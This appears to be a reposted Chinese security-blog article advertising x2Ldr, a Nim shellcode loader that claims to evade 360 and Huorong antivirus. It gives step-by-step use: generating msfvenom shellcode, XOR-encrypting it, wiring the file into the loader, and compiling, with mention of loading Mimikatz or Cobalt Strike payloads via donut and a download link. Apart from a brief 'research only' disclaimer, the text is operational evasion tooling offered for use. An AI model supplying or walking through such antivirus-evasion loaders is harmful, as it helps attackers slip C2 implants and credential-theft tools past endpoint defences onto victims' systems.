x2Ldr!Nim免杀过某数字、某绒

admin 2023年12月26日10:50:26评论50 views字数 767阅读2分33秒阅读模式
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

 

现在只对常读和星标的公众号才展示大图推送,建议大家把Hack分享吧“设为星标”,否则可能看不到了!

 

工具介绍

Nim免杀过某数字、某绒,通过读入Msfvenom或Cobalt Strike等C2的Shellcode方式分离免杀,或者装donut可以将exe、dll转为Shellcode加载MimiKatz等工具。
免杀效果:火绒、360(未开核晶)均联网

x2Ldr!Nim免杀过某数字、某绒

x2Ldr!Nim免杀过某数字、某绒

x2Ldr!Nim免杀过某数字、某绒

使用方法

在windows配置nim环境,官网下载

https://nim-lang.org/download/nim-2.0.0_x64.zip‍

msfvenom生成shellcode

msfvenom -a x64 -p windows/x64/exec CMD=calc -f raw -o calc_x64.bin

xor加密msfvenom生成的raw格式shellcode

> python .xorencrypt.py .calc_x64.bin> xor encrypted : .calc_encrypted.bin
将加密后的文件名作为参数传递给 nim 文件中的 fopen 参数
  //修改这里  char key[] = "key";
  //修改这里  fp = fopen("user.dat", "rb");

编译

nim c -d=mingw --app=gui --cpu=amd64 -d:release --opt:size --passL:-static .x2Ldr.nim
下载地址

https://github.com/yutianqaq/x2Ldr

https://github.com/yutianqaq/x2Ldr

原文始发于微信公众号(Hack分享吧):x2Ldr!Nim免杀过某数字、某绒

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月26日10:50:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   x2Ldr!Nim免杀过某数字、某绒https://cn-sec.com/archives/2334619.html

发表评论

匿名网友 填写信息